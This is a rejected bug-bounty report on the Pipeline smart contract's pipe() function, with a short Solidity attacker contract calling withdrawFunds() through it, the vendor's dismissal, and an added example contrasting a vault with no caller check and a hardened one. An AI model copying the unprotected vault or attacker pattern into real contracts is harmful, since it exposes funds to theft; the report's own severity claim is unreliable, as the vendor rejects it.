Theft of fund with Pipeline
Report ID
#14504
Target
Report type
Smart Contract
Impacts
Direct theft of any user funds, whether at-rest or in-motion, other than unclaimed yield
Has PoC?
Yes
Bug Description
The pipeline contract allows users to call any function on other protocols through the pipe() and multiPipe() functions. This means that an attacker could call a function on another contract that allows them to transfer funds out of that contract.
Impact
allows anyone to withdraw funds, an attacker could call that function through the pipeline contract and steal the funds from the other contract.
Risk Breakdown
Difficulty to Exploit: Medium
Weakness:
CVSS2 Score: 6
Recommendation
to include a requirement for users to provide proof of ownership of the funds they are attempting to transfer through the pipe() or multiPipe() functions.
Proof of concept
pragma solidity ^0.8.0;

// Declarations the PoC relies on, inferred from how it uses them
struct PipeCall {
    address target;
    bytes data;
}

interface IPipeline {
    function pipe(PipeCall calldata p) external payable returns (bytes memory result);
}

// Attacker contract
contract Attacker {
    // Address of the Pipeline contract
    address pipelineAddress;
    // Address of the vulnerable contract
    address vulnerableAddress;

    constructor(address _pipelineAddress, address _vulnerableAddress) {
        pipelineAddress = _pipelineAddress;
        vulnerableAddress = _vulnerableAddress;
    }

    // Function to call the vulnerable contract's withdrawFunds() function
    // through the Pipeline contract
    function attack() public {
        // Create a PipeCall struct with the target set to the vulnerable contract's
        // address and the calldata set to the ABI-encoded withdrawFunds() function call
        PipeCall memory call = PipeCall({
            target: vulnerableAddress,
            data: abi.encodeWithSignature("withdrawFunds()")
        });

        // Call the pipe() function on the Pipeline contract to execute the function
        // call on the vulnerable contract, which would allow the attacker to steal all of
        // the vulnerable contract's funds.
        IPipeline(pipelineAddress).pipe(call);
    }
}
BIC Response
This is not a security bug report because the report outlines expected functionality. Pipeline was built with the philosophy that it is not the smart contract's role to protect users against misuse. See the Risk section of the Pipeline whitepaper: https://evmpipeline.org/pipeline.pdf#section.6
Due to these reasons, we are closing the submission and no reward will be issued.
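The scenario in the report depends on the target contract exposing a withdrawFunds() with no caller check. The added example below (not part of the report, the BIC response or the Pipeline code base) puts such a contract beside a hardened form. Both contracts are constructed for illustration, and it assumes Pipeline forwards with a regular external call, so the target sees the Pipeline contract as msg.sender.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Constructed for illustration: withdrawFunds() pays the whole balance to
// whoever calls it. The missing caller check is the defect; it is reachable
// by any direct caller, whether or not the call is routed through Pipeline.
contract UnprotectedVault {
    receive() external payable {}

    function withdrawFunds() external {
        (bool ok, ) = msg.sender.call{value: address(this).balance}("");
        require(ok, "transfer failed");
    }
}

// Hardened form (constructed): balances are tracked per depositor and a
// caller can only withdraw what was credited to its own address.
contract ProtectedVault {
    mapping(address => uint256) public balanceOf;

    function deposit() external payable {
        balanceOf[msg.sender] += msg.value;
    }

    function withdrawFunds() external {
        // Assumption: when reached through pipe(), msg.sender is the Pipeline
        // contract, so only a balance credited to Pipeline itself is payable.
        uint256 amount = balanceOf[msg.sender];
        require(amount > 0, "nothing to withdraw");

        // Zero the balance before the external call (checks-effects-interactions)
        balanceOf[msg.sender] = 0;

        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }
}
```

With the hardened form, a call relayed by Pipeline on behalf of an address that never deposited reverts with "nothing to withdraw", which places the authorization check in the contract that holds the funds.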